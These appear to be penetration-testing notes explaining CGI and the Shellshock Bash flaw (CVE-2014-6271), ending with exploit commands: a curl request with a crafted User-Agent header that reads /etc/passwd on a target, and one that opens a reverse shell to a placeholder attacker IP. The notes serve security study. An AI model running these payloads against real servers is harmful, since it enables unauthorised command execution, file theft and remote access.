# CGI Applications

## **Introduction**

> * A Common Gateway Interface (CGI) is used to help a web server render dynamic pages and create a customized response for the user making a request via a web application.
> * CGI applications are primarily used to access other applications running on a web server.
> * CGI is essentially middleware between web servers, external databases, and information sources.
> * CGI scripts and programs are kept in the `/CGI-bin` directory on a web server
> * Typically written in C, C++, Java, PERL, etc
> * CGI scripts run in the security context of the web server

***

## **CGI Applications - Shellshock \[CVE-2014-6271]**

> * The most well-known CGI attack is exploiting the Shellshock (aka, "Bash bug") vulnerability via CGI.
> * **Resource:** <https://nvd.nist.gov/vuln/detail/CVE-2014-6271>
> * **Affected Versions:** `GNU Bash up until version 4.3`
> * **Description:** Shellshock is a security flaw in the Bash shell that allows an attacker to `execute operating system commands that are included after a function stored inside an environment variable.`
> * **PoC Example:** `env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"`
>   * Nothing will happen when the environment variable is assigned a value
>   * If the target is vulnerable, whenever the environment variable is imported, the command `echo vulnerable-shellshock` will be executed
>   * If the target is NOT vulnerable, then the command `echo not vulnerable` will be executed

**Shellshock PoC to read any file:**\
`curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://target.com/cgi-bin/access.cgi`

**Shellshock PoC to gain a Reverse Shell:**\
`curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/your-ip/your-nc-port 0>&1' http://target.com/cgi-bin/access.cgi`